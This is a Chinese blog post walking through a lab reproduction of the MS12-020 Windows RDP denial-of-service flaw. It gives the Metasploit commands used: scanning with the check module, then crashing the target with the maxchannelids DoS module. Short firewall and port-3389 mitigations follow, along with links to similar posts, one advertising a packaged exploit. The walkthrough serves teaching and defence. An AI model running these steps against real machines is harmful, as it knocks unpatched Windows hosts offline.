MS12-020(死亡蓝屏)漏洞复现及防范措施

最新推荐文章于 2025-03-14 11:29:33 发布
最新推荐文章于 2025-03-14 11:29:33 发布
阅读量1.8k 收藏 23
点赞数 10
分类专栏: 漏洞复现 文章标签: 网络安全 安全 系统安全 网络攻击模型 计算机网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57538478/article/details/140697693
版权

一、漏洞简介

1.简介

漏洞名:MS12-020(全称:Microsoft windows远程桌面协议RDP远程代码执行漏洞)

 2.介绍

MS12-020是一个针对远程桌面(RDP)协议的漏洞,其最严重的情况可能会造成远程执行代码,而通常情况下会造成对方蓝屏。 

二、环境准备 

靶机:Windows7或 Windows Server 2008

攻击者:kali Linux

条件:两台主机可以互相ping通,并且无防火墙

 三、攻击复现

1.获取ip地址

使用ifconfig  ipconfig命令分别获取攻击者和靶机的IP的地址

①攻击者ip地址

#ifconfig

 

②靶机ip地址

#ipconfig

 

2.启动MSF 

使用 msfconsole 命令打开 Metasploit 渗透测试平台

#msfconsole

 

3.启用攻击模块 

#search MS12-020

 4.分析模块

①auxiliary/scanner/rdp/ms12_020_check                                        ------扫描模块

②auxiliary/dos/windows/rdp/ms12_020_maxchannelids                 -------攻击模块 

 5.对目标进行扫描

#use 0             ---- 使用扫描模块

#show options  ---查看配置信息

#set rhosts 【靶机ip】      ---设置靶机ip

#run      -----启动

6. 发现存在漏洞

 发现 【+】和The target is vulnerable,证明目标主机存在MS12_020漏洞,可以利用

#The target is vulnerable    -----目标易受攻击

 

 7.使用攻击模块

#back                    ----退出模块

#use 1                   ----使用攻击模块

#show options       -----查看配置信息

#set rhosts            -----设置靶机ip

#exploit                 ------运行(与run功能一致)

8.攻击成功

靶机已蓝屏

#seems down    ------表示目标已被攻击

 四、防范措施

①开启防火墙或者关闭3389端口

②若需要用,就对防火墙配置策略,允许哪些IP才可以访问你RDP协议(即关闭远程桌面)

[系统安全] 十八.病毒攻防机理及WinRAR恶意劫持漏洞(bat病毒、自启动、定时关机、蓝屏攻击)
杨秀璋的专栏
02-03 7032
作者前文介绍了Windows PE病毒, 包括PE病毒原理、分类及感染方式详解;这篇文章将讲解简单的病毒原理和防御知识,并通过批处理代码和漏洞(CVE-2018-20250)利用让大家感受下病毒攻击的过程,提出了安全相关建议,包括自动启、修改密码、定时关机、蓝屏、进程关闭等功能。 这些基础性知识不仅和系统安全相关,同样与我们身边常用的软件、操作系统紧密联系,希望这些知识对您有所帮助,更希望大家提高安全意识,安全保障任重道远。
[网络安全提高篇] 一一二.DataCon Coremail邮件安全竞赛之钓鱼邮件识别及分类
热门推荐
杨秀璋的专栏
10-26 2万+
这是作者2020年参加清华大学、Coremail、奇安信DataCon举办的比赛,主要是关于钓鱼和异常邮件识别研究。非常感谢举办方让我们学到了新知识,DataCon也是我比较喜欢和推荐的大数据安全比赛,这篇文章2020年10月就进了我的草稿箱,但由于小珞珞刚出生,所以今天才发表,希望对您有所帮助!感恩同行,不负青春。
漏洞复现--实验记录(MS12-020MS14-064)
qq_72421395的博客
08-05 2256
ms12-020漏洞的定义是指操作系统的远程桌面协议存在重大漏洞,入侵者(黑客)可以通过向远程桌面默认端口(3389)发一系列特定RDP包,从而获取超级管理员权限,进而入侵系统,Windows在处理某些RDP报文时Terminal Server 存在错误,可被利用造成服务停止响应(蓝屏)生成一个恶意链接,让用户点击后,用户的ie浏览器会执行操作:访问攻击者指定的ip下载并执行恶意程序,当用户执行恶意程序后,攻击者就能链接到用户的电脑。
漏洞复现MS12-020漏洞蓝屏攻击)复现
m0_53223419的博客
01-27 1655
使用windows虚拟机、linux虚拟机复现MS12-020漏洞
全版本Windows RCE漏洞复现CVE-2023-36025,从零基础到精通,收藏这篇就够了!
最新发布
yy1715713348的博客
03-14 1049
*,使用者后果自负。**‍一、开启SMB服务器关闭系统SMB服务,不让445端口占用,使用CloseSMB模块,重启生效,当然也可以不关闭,直接使用系统的开启SMB共享,因为这洞和Win11主题RCE不一样,不需要特制SMB共享。关闭SMBPS: 彻底关闭445端口,SMB相关服务,重启生效,可防止SMB漏洞或新出0day攻击,在VPS上使用一键程序会比开启系统SMB要安全很多,除非别人挖Ladon的SMB服务器漏洞,且用完就关,很安全。一键开启SMB匿名共享。
ms12-020漏洞
cencen666的博客
11-02 9508
ms12-020漏洞 (全称:Microsoft windows远程桌面协议RDP远程代码执行漏洞死亡蓝屏。这是远程桌面协议中两个秘密报告的漏洞。如果攻击者向受影响的系统发送一系列特制 RDP 数据包,则这些漏洞中较严重的漏洞可能允许远程执行代码。默认情况下,任何 Windows 操作系统都未启用远程桌面协议 (RDP)。没有启用 RDP 的系统不受威胁。 概念 RDP协议是一个多通道的协议,让用户连上提供微软终端机服务的电脑。 windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化
ms12-020漏洞复现
yyds132310的博客
05-07 2161
windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化或已经删除的对象,导致任意代码执行。msf6 auxiliary(scanner/rdp/ms12_020_check) > set rhosts 192.168.239.135 #指定靶机地址。auxiliary/dos/windows/rdp/ms12_020_maxchannelids是攻击模块。auxiliary/scanner/rdp/ms12_020_check是扫描模块。#扫描系统的3389端口是否是开放的。
ms12-020(蓝屏攻击漏洞复现)
Martin-share的博客
02-11 5318
ms12-020(蓝屏攻击漏洞复现)
ms12-020 死亡蓝屏漏洞复现
lianliandad的博客
11-01 3185
好好学习
网络安全-DoS与DDoS攻击原理(TCP、UDP、CC攻击等)与防御_简述dos和ddos的攻击原理和防范措施
2401_84247760的博客
04-29 1063
DoS,是的简称,即拒绝服务,造成DoS的攻击行为被称为DoS攻击,其目的是使计算机或网络无法提供正常的服务。最常见的DoS攻击有计算机网络带宽攻击和连通性攻击。一般是使用一台计算机进行攻击。
[网络安全自学篇] 七十七.恶意代码与APT攻击中的武器
杨秀璋的专栏
05-14 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了逆向分析之OllyDbg动态调试工具,包括INT3断点、反调试、硬件断点和内存断点。这篇文章将带大家学习安天科技集团首席架构师肖新光老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。作者很少会在标题写“强推”的字样,但这篇文章真的值得学习,也希望对您有所帮助。
MS12-020漏洞各个版本PoC&EXP打包(含NC,亲测可用)
11-07
MS12-020漏洞各个版本PoC&EXP打包(含NC,亲测可用) [网上流传版]MS12-020 PoC[bug修正版 + 数据包nc发送版] [个人版]ms12-020 Ruby,Python,EXE,DAT,NC一应俱全
[网络安全自学篇] 八十八.基于机器学习的恶意代码检测技术详解
杨秀璋的专栏
07-19 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了传统的恶意代码检测技术,包括恶意代码检测的对象和策略、特征值检测技术、校验和检测技术、启发式扫描技术、虚拟机检测技术和主动防御技术。这篇文章将介绍基于机器学习的恶意代码检测技术,主要参考郑师兄的视频总结,包括机器学习概述与算法举例、基于机器学习方法的恶意代码检测、机器学习算法在工业界的应用。同时,我再结合自己的经验进行扩充,详细分享了基于机器学习的恶意代码检测技术,基础性文章,希望对
MS12——020漏洞复现
m0_56267052的博客
04-11 556
MS12_020 开启靶机3389端口 开启远程桌面服务 第三、 Win7: 查看3389端口是否开启 Kali: Ping的通,表示两个电脑可以连通 进入metasploit渗透测试平台 搜索漏洞 auxiliary/scanner/rdp/ms12_020_check ------用来扫描判断靶机是否存在ms12_020漏洞 auxiliary/dos/windows/rdp/ms12_020_ma..
MS12-020 漏洞复现
Clannad的博客
03-13 761
文章目录环境漏洞复现: 环境 攻击者:kaili(192.168.160.179) 受害者:Server 2008 R2 、Win7、 受害者IP:192.168.160.174 漏洞复现: 1、利用msf来检查对方是否有MS12-020漏洞 search ms12-020 2、利用此模块来检查是否有此漏洞 use auxiliary/scanner/rdp/ms12_020_check...
网安实训(十)| Ms12-020 漏洞复现
朔方鸟的博客
02-19 5966
Ms12-020是针对Windows系统的远程桌面协议的漏洞,通过该漏洞,攻击者可通过对目标系统发送特定内容造成系统蓝屏故障。 实验将利用Metasploit进行MS12-020漏洞复现和攻击。
MS12_020 漏洞利用与安全加固
theRavensea
03-18 3050
MS12_020 漏洞全称为:Microsoft Windows 远程桌面协议远程代码执行漏洞。 远程桌面协议(Remote Desktop Protocol,RDP),是一个多通道(mutil-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的计算机(服务器端或称“远程计算机”)。Windows 在处理某些对象是存在错误,可通过特制的 RDP 报文访问未初始化的或已经删除的对象,导致任意代码执行,进而控制系统。
漏洞分析:MS12-020漏洞
liu914589417的博客
04-28 6561
漏洞分析:MS12-020漏洞 实验工具 1、VMware虚拟机 2、Kali 2021 系统虚拟机 3、Windows 7系统虚拟机 1、第一步:在VMware中打开Kali 2021虚拟机和Windows 7虚拟机,并确保两台机器能够互相【Ping】通,网络连接正常。 2、确定能连通后,打开MSF攻击框架,Kali 2021【终端】中输入命令【msfconsole】。 3、输入搜索命令,搜索MS12-020漏洞,输入命令【search ms12_020】。 4、引用编号为【1】的漏洞,引用漏洞路径,
MS12-020漏洞攻击复现
行动、坚持。
01-24 2617
1、漏洞说明 MS12-020:开启远程桌面服务(3389端口)的系统可被执行远程代码(蓝屏重启) 受影响系统:Windows XP、Windows 7、Server 2003/2008 (漏洞官方说明) 2、实验环境 网络:Win Server 2003 <-> Win XP 角色:Win Server 2003 模拟黑客,Win XP模拟肉鸡/靶机 3、实验流程 DOS下开启远程服务: REG ADD HKLM\SYSTEM\CurrentControlSet\Contr
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值